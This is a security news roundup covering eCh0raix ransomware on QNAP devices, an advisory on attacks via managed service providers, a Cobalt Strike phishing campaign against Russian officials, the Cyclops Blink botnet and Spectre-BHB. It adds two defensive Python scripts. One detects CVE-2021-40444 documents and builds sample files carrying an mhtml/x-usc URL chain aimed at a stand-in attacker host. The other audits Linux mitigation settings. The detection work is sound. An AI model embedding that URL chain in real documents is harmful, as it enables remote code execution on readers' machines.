During the first five months of 2022, WordPress sites accounted for 61 per cent of known credit card skimmer detections, followed by Magento (15.6 per cent), OpenCart (5.5 per cent), and others (17.7 per cent). 

"Attackers follow the money, so it was only a matter of time before they shifted their focus toward the most popular e-commerce platform on the web," Sucuri's Ben Martin stated at the time.

QNAP NAS Devices Struck by eCh0raix Ransomware Attacks

 

The eCh0raix ransomware resumed targeting vulnerable QNAP Network Attached Storage (NAS) devices this week, according to user reports and sample uploads to the ID Ransomware site.

eCh0raix (also known as QNAPCrypt) first hit QNAP customers in several large-scale waves in the summer of 2019, when attackers brute-forced their way into Internet-exposed NAS devices. Victims have since reported further campaigns, in May 2020, June 2020, and a large wave against devices with weak passwords that began in mid-December 2021 (just before Christmas) and tailed off towards early February 2022. 

A fresh series of eCh0raix attacks has been confirmed by a rise in ID Ransomware submissions and by users reporting infections on the BleepingComputer forums, with the first hit on June 8. 

Although only a few dozen eCh0raix samples have been submitted, the real number of successful attacks is likely higher, because only a subset of victims use the ID Ransomware service to identify the ransomware that encrypted their devices. 

While this ransomware has also been used to encrypt Synology NAS devices since August 2021, this time victims have only reported attacks on QNAP NAS devices. The attack vector used in the current eCh0raix campaign is unknown, pending further information from QNAP. 

How to Protect NAS Against Attacks 

While QNAP has yet to warn customers about these attacks, the company has previously recommended that users protect their data from eCh0raix by:
  • using stronger passwords for administrator accounts,
  • enabling IP Access Protection to protect accounts from brute-force attacks, and
  • moving the system off the default port numbers 443 and 8080.
In its security advisory, QNAP gives step-by-step instructions for changing the NAS password, enabling IP Access Protection, and changing the system port number. Changing ports only hides the device from casual scanning; the brute-force protection and keeping the NAS off the Internet are what actually stop these attacks.

The Taiwanese hardware maker also advises customers to disable Universal Plug and Play (UPnP) port forwarding on their routers so that the NAS is not exposed to Internet-based attacks, to disable SSH and Telnet connections, and to enable IP and account access protection by following its step-by-step instructions. On Thursday, QNAP also urged users to protect their devices against the ongoing DeadBolt ransomware attacks. 

"According to the investigation by the QNAP Product Security Incident Response Team (QNAP PSIRT), the attack targeted NAS devices using QTS 4.3.6 and QTS 4.4.1, and the affected models were mainly TS-x51 series and TS-x53 series," the NAS maker stated.

"QNAP urges all NAS users to check and update QTS to the latest version as soon as possible, and avoid exposing their NAS to the Internet."

Cyber Agencies: Beware of State Actors Levelling up Attacks on Managed Service Providers

 

Cybersecurity agencies from the United States, the United Kingdom, Australia, and Canada issued a further joint advisory this week stating that cyberattacks against managed service providers (MSPs) are expected to increase. 

According to the advisory, an attacker who gains access to a service provider's infrastructure can carry out ransomware or espionage operations against the provider's customers. 

The nations advised, "Whether the customer's network environment is on-premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects." 

"NCSC-UK, ACSC, CCCS, CISA, NSA, and FBI expect malicious cyber actors -- including state-sponsored advanced persistent threat groups -- to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships." 

For the purposes of the advisory, "MSP" covers providers of IaaS, PaaS, SaaS, business process and support services, and cybersecurity services. The first, obvious piece of advice is to avoid being compromised in the first place. Beyond that, the standard recommendations apply: improve monitoring and logging, keep software updated, keep backups, use multi-factor authentication, segment internal networks, apply least privilege, and remove stale user accounts. Customers should also check their contracts for clauses that require the MSP to have adequate security safeguards in place.

Further, the advisory stated, "Customers should ensure that they have a thorough understanding of the security services their MSP is providing via the contractual arrangement and address any security requirements that fall outside the scope of the contract. Note: contracts should detail how and when MSPs notify the customer of an incident affecting the customer's environment."
 
"MSPs, when negotiating the terms of a contract with their customer, should provide clear explanations of the services the customer is purchasing, services the customer is not purchasing, and all contingencies for incident response and recovery."

New Spear Phishing Campaign Targets Russian Dissidents

 

A new spear-phishing campaign is under way in Russia, targeting people who hold views on the war in Ukraine that differ from those presented by the state and national media. The campaign sends emails to government personnel and public servants, warning them about software and online platforms that are banned in the country. 

The emails carry a malicious attachment or link that drops a Cobalt Strike beacon on the recipient's computer, giving the operators remote access to spy on the victim. The campaign was discovered and documented by Malwarebytes Labs threat analysts, who obtained samples of the lure emails. 

Various phishing methods

To persuade recipients to open the attachment, the phishing emails pretend to come from a Russian state organisation, ministry, or federal service. The two most commonly spoofed senders are the "Russian Federation Ministry of Information Technologies and Communications" and the "Russian Federation Ministry of Digital Development, Communications, and Mass Communications." 

To deliver Cobalt Strike, the threat actors use three file types: RTF (rich text format) documents, archive attachments containing malicious documents, and download links placed in the email body. The RTF case is the most interesting because it exploits CVE-2021-40444, a remote code execution flaw in MSHTML, the browser rendering engine that Microsoft Office documents can invoke through an embedded ActiveX control; opening the document outside Protected View can be enough to trigger it. 
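For mail-gateway or incident triage, the CVE-2021-40444 documents have a recognisable shape: an OLE object whose target is an mhtml: URL chained with !x-usc: to the attacker's page. The checker below is an added example written for this page (not Malwarebytes code), covering both carriers the campaign used: an RTF with the object hex-encoded in \objdata, and an OOXML document whose relationship file points an external oleObject at that URL. It is a heuristic, not a complete signature, and the samples it builds (including the hypothetical attacker.example URL) are constructed, not real malware.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Set

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
OBJDATA = re.compile(rb"\\objdata\b\s*([0-9a-fA-F\s]+)")


def _url_indicators(blob: bytes) -> Set[str]:
    """Look for the MSHTML exploit chain markers in raw bytes, ASCII or UTF-16LE."""
    found = set()
    lowered = blob.lower()
    for marker, label in ((b"mhtml:", "mhtml-url"), (b"!x-usc:", "x-usc-chain")):
        if marker in lowered or marker.decode().encode("utf-16le") in lowered:
            found.add(label)
    return found


def scan_rtf(data: bytes) -> Set[str]:
    """Triage an RTF: decode embedded OLE object hex and look for the
    mhtml:/x-usc: URL chain; also note \\objupdate, which forces the object
    to load when the document is opened."""
    found = set()
    if re.search(rb"\\objupdate\b", data):
        found.add("objupdate")
    for m in OBJDATA.finditer(data):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]
        try:
            decoded = bytes.fromhex(hexdata.decode("ascii"))
        except ValueError:
            continue
        found |= _url_indicators(decoded)
    found |= _url_indicators(data)  # some variants leave the URL in plain text
    return found


def scan_docx(data: bytes) -> Set[str]:
    """Triage an OOXML document: a relationship that points an OLE object at
    an external mhtml: URL is the CVE-2021-40444 pattern."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            xml = zf.read(name)
            found |= _url_indicators(xml)
            for rel in ET.fromstring(xml).iter():
                if not rel.tag.endswith("Relationship"):
                    continue
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    found.add("external-oleobject")
    return found


def triage(data: bytes) -> Set[str]:
    """Dispatch on file magic; unknown formats return no indicators."""
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return scan_docx(data)
    return set()


# Constructed samples (not real malware), carrying the URL chain the way the
# exploit documents do.
CHAIN = "mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html"

SAMPLE_RTF = (
    "{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata "
    + CHAIN.encode("utf-16le").hex()
    + "}}}"
).encode()


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Minimal OOXML container with one oleObject relationship."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId5" Type="{OLE_REL}" Target="{target}"'
        + (' TargetMode="External"' if external else "")
        + "/></Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print("rtf:", sorted(triage(SAMPLE_RTF)))
    print("docx:", sorted(triage(build_sample_docx(CHAIN))))
    print("benign docx:", sorted(triage(build_sample_docx("embeddings/oleObject1.bin", external=False))))
```

An embedded OLE object on its own is common in legitimate documents; the combination of an external target, the mhtml: scheme and an \objupdate that fires it on open is what should route the file to a sandbox.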

All of the phishing emails are written in Russian, as expected, and appear to have been composed by native speakers rather than machine-translated, suggesting the campaign is run by Russian-speaking operators. Alongside Cobalt Strike, Malwarebytes found parallel attempts to distribute a heavily obfuscated PowerShell-based remote access trojan (RAT) capable of fetching next-stage payloads. 

The campaign's targets mostly work for the Russian government and public sector, including the following organisations: 
  • Official Internet portal of the authorities of the Chuvash Republic
  • Russian Ministry of Internal Affairs
  • Ministry of Education and Science of the Republic of Altai
  • Ministry of Education of the Stavropol Territory
  • Ministry of Education and Science of the Republic of North Ossetia-Alania
  • Government of the Astrakhan Region
  • Ministry of Education of the Irkutsk Region
  • Portal of state and municipal services of the Moscow Region
  • Ministry of Science and Higher Education of the Russian Federation
Judging by this list, the phishing actors are targeting people in positions from which they could cause trouble for the central government by stirring up anti-war sentiment.

This New Russian Cyclops Blink Botnet Targets ASUS Routers

 

ASUS routers have become the target of a growing botnet known as Cyclops Blink, nearly a month after the malware was found using WatchGuard firewall appliances as a stepping stone to remote access into compromised networks. 

According to Trend Micro, the botnet's main purpose is to build infrastructure for further attacks on high-value targets, since none of the compromised hosts belongs to a critical organisation or has obvious value for economic, political, or military espionage. 

Intelligence agencies in the United Kingdom and the United States have identified Cyclops Blink as a replacement framework for VPNFilter, malware that targeted network equipment, particularly small office/home office (SOHO) routers and network-attached storage (NAS) devices. 

Both VPNFilter and Cyclops Blink have been linked to Sandworm (aka Voodoo Bear), a Russian state-sponsored actor also tied to several high-profile cyberattacks, including the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, and the 2018 Olympic Destroyer attack on the Winter Olympic Games. 

The modular botnet, written in C, affects the following ASUS router models; the company says it is working on a patch to address any potential exploitation: 
  • GT-AC5300 firmware under 3.0.0.4.386.xxxx
  • GT-AC2900 firmware under 3.0.0.4.386.xxxx
  • RT-AC5300 firmware under 3.0.0.4.386.xxxx
  • RT-AC88U firmware under 3.0.0.4.386.xxxx
  • RT-AC3100 firmware under 3.0.0.4.386.xxxx
  • RT-AC86U firmware under 3.0.0.4.386.xxxx
  • RT-AC68U, AC68R, AC68W, AC68P firmware under 3.0.0.4.386.xxxx
  • RT-AC66U_B1 firmware under 3.0.0.4.386.xxxx
  • RT-AC3200 firmware under 3.0.0.4.386.xxxx
  • RT-AC2900 firmware under 3.0.0.4.386.xxxx
  • RT-AC1900P firmware under 3.0.0.4.386.xxxx
  • RT-AC87U (end-of-life)
  • RT-AC66U (end-of-life), and
  • RT-AC56U (end-of-life)
Besides using OpenSSL to encrypt its connections to the command-and-control (C2) servers, Cyclops Blink includes modules that can read from and write to the device's flash memory, which lets it persist and survive factory resets. A reconnaissance module exfiltrates data from the infected device to the C2 server, while a file download component retrieves arbitrary payloads over HTTPS. Although the initial access method is still unknown, Cyclops Blink has been infecting WatchGuard appliances and ASUS routers in the United States, India, Italy, Canada, and Russia since June 2019. 

Among the affected hosts are a law firm in Europe, a medium-sized maker of dental equipment in Southern Europe, and a plumbing company in the United States. Because IoT devices and routers are rarely patched and seldom run security software, Trend Micro warns that this could lead to "eternal botnets".

The researchers stated, "Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do. In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable command-and-control servers for other bots."

New Exploit Circumvents Existing Spectre-V2 Mitigations in Intel and Arm CPUs

 

Researchers have revealed a new technique that can bypass existing hardware mitigations in modern Intel, AMD, and Arm processors and stage speculative execution attacks such as Spectre to leak sensitive data from host memory. 

Spectre attacks break the isolation between applications by abusing speculative execution, a performance optimisation in CPU hardware, to trick programs into touching arbitrary memory regions and leaking their contents. Chipmakers and operating systems have responded with software defences such as Retpoline and hardware safeguards such as Enhanced Indirect Branch Restricted Speculation (eIBRS) and Arm CSV2; the latest technique, demonstrated by VUSec researchers, sidesteps all of them. 

Branch History Injection (BHI or Spectre-BHB), tracked as CVE-2022-0001 on Intel (with an intra-mode variant, CVE-2022-0002) and CVE-2022-23960 on Arm, is a new variant of the Spectre-V2 family (CVE-2017-5715) that circumvents both eIBRS and CSV2 and, according to the researchers, exposes arbitrary kernel memory on modern Intel CPUs.

"The hardware mitigations do prevent the unprivileged attacker from injecting predictor entries for the kernel," the researchers explained,

"However, the predictor relies on a global history to select the target entries to speculatively execute. And the attacker can poison this history from userland to force the kernel to mispredict to more 'interesting' kernel targets (i.e., gadgets) that leak data," the Systems and Network Security Group at Vrije Universiteit Amsterdam added. 

Put another way, malicious code can use the branch history held in the CPU's Branch History Buffer (BHB), which is shared across privilege levels, to steer mispredicted branches in the victim's hardware context, leading to speculative execution that can then be used to infer information that would otherwise be inaccessible. All Intel and Arm processors previously vulnerable to Spectre-V2, as well as a number of AMD chipsets, are affected by Spectre-BHB, prompting the three companies to release software updates. 

Intel also recommends that customers disable unprivileged extended Berkeley Packet Filter (eBPF) in Linux, enable both eIBRS and Supervisor-Mode Execution Prevention (SMEP), and add LFENCE instructions to specific gadgets found to be exploitable. Unprivileged eBPF matters because it lets a local attacker load code the kernel will execute, which is how the researchers built the disclosure gadget their exploit needs. 
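A quick way to check a Linux host against that guidance, added here as an example (not Intel or VUSec tooling): read the kernel's spectre_v2 status, the kernel.unprivileged_bpf_disabled sysctl and the CPU flags, and report each gap. The two sample hosts are constructed in the formats the kernel uses; the "BHI:" field only appears in kernels that carry the BHI mitigation code, so its absence is not itself a finding.

```python
import re
from typing import Dict, List

SPECTRE_V2_SYSFS = "/sys/devices/system/cpu/vulnerabilities/spectre_v2"
UNPRIV_BPF_SYSCTL = "/proc/sys/kernel/unprivileged_bpf_disabled"
CPUINFO = "/proc/cpuinfo"

# Enhanced IBRS (Intel) or Automatic IBRS (AMD) as the kernel prints it.
EIBRS = re.compile(r"Enhanced(?: / Automatic)? IBRS|Automatic IBRS|eIBRS")


def assess_bhi_posture(spectre_v2: str, unprivileged_bpf_disabled: int,
                       cpu_flags: str) -> List[str]:
    """Compare a host's state with the post-BHI guidance: a kernel mitigation
    for spectre_v2 that uses eIBRS, unprivileged eBPF switched off, and SMEP
    available. Returns one finding per gap; an empty list means none found."""
    findings = []
    status = spectre_v2.strip()
    if status == "Not affected":
        pass
    elif not status.startswith("Mitigation:"):
        findings.append(f"spectre_v2 reports no mitigation: {status!r}")
    elif not EIBRS.search(status):
        findings.append("spectre_v2 mitigation does not use enhanced IBRS")
    if "BHI: Vulnerable" in status:
        findings.append("kernel reports the BHI attack surface as unmitigated")
    # 0 = unprivileged bpf() allowed; 1 = disabled permanently; 2 = disabled
    # but can be re-enabled by root.
    if unprivileged_bpf_disabled == 0:
        findings.append("unprivileged eBPF is enabled (set kernel.unprivileged_bpf_disabled=1 or 2)")
    if "smep" not in cpu_flags.split():
        findings.append("CPU does not expose SMEP")
    return findings


def read_host() -> Dict[str, object]:
    """Collect the three inputs from a live Linux host (best effort; on other
    systems the files are missing and the result reads as fully exposed)."""
    def read(path: str) -> str:
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    flags = ""
    for line in read(CPUINFO).splitlines():
        if line.startswith("flags"):
            flags = line.split(":", 1)[1]
            break
    bpf = read(UNPRIV_BPF_SYSCTL).strip()
    return {
        "spectre_v2": read(SPECTRE_V2_SYSFS) or "unknown",
        "unprivileged_bpf_disabled": int(bpf) if bpf.isdigit() else 0,
        "cpu_flags": flags,
    }


# Constructed inputs in the kernel's own format: one host that still allows
# unprivileged eBPF on a CPU without SMEP, one that follows the guidance.
EXPOSED_HOST = {
    "spectre_v2": "Mitigation: Enhanced IBRS, IBPB: conditional, RSB filling\n",
    "unprivileged_bpf_disabled": 0,
    "cpu_flags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov",
}
HARDENED_HOST = {
    "spectre_v2": "Mitigation: Enhanced IBRS, IBPB: conditional, RSB filling\n",
    "unprivileged_bpf_disabled": 2,
    "cpu_flags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov smep smap",
}

if __name__ == "__main__":
    for name, host in (("exposed", EXPOSED_HOST), ("hardened", HARDENED_HOST),
                       ("this host", read_host())):
        print(name, assess_bhi_posture(**host) or ["no gaps found"])
```

Setting kernel.unprivileged_bpf_disabled=1 is irreversible until reboot, which is the right choice for servers that never load BPF from unprivileged users; 2 keeps a root-only escape hatch. Neither replaces the microcode and kernel updates the vendors shipped.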

The researchers stated, "The [Intel eIBRS and Arm CSV2] mitigations work as intended, but the residual attack surface is much more significant than vendors originally assumed. Nevertheless, finding exploitable gadgets is harder than before since the attacker can't directly inject predictor targets across privilege boundaries. That is, the kernel won't speculatively jump to arbitrary attacker-provided targets, but will only speculatively execute valid code snippets it already executed in the past."